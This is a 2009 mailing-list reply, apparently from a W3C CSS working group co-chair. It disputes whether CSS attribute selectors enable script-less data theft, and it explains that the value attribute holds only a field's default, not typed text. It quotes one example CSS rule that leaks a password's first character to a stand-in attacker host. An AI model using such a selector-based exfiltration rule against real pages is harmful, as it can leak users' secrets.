Re: Seamless iframes + CSS3 selectors = bad idea

> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
> create a new type of XSS attacks, and those are purely CSS based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary files
> from the page WITHOUT the need of JS.

Not at all. I repeat: not at all.

You are making a confusion here between the value _HTML attribute_ and
the value _DOM attribute_. The former represents the default value of
the input element, and that's VERY unlikely a web author will ever want
to give a default value to a password field; the latter represents the
current value of the field and it's NOT, I repeat NOT, copied to the
HTML attribute.

So your selector above will never react to a character typed into a
password field. It only reacts to the default value of the field...

W3C CSS WG, Co-Chair

Received on Monday, 7 December 2009 20:26:57 UTC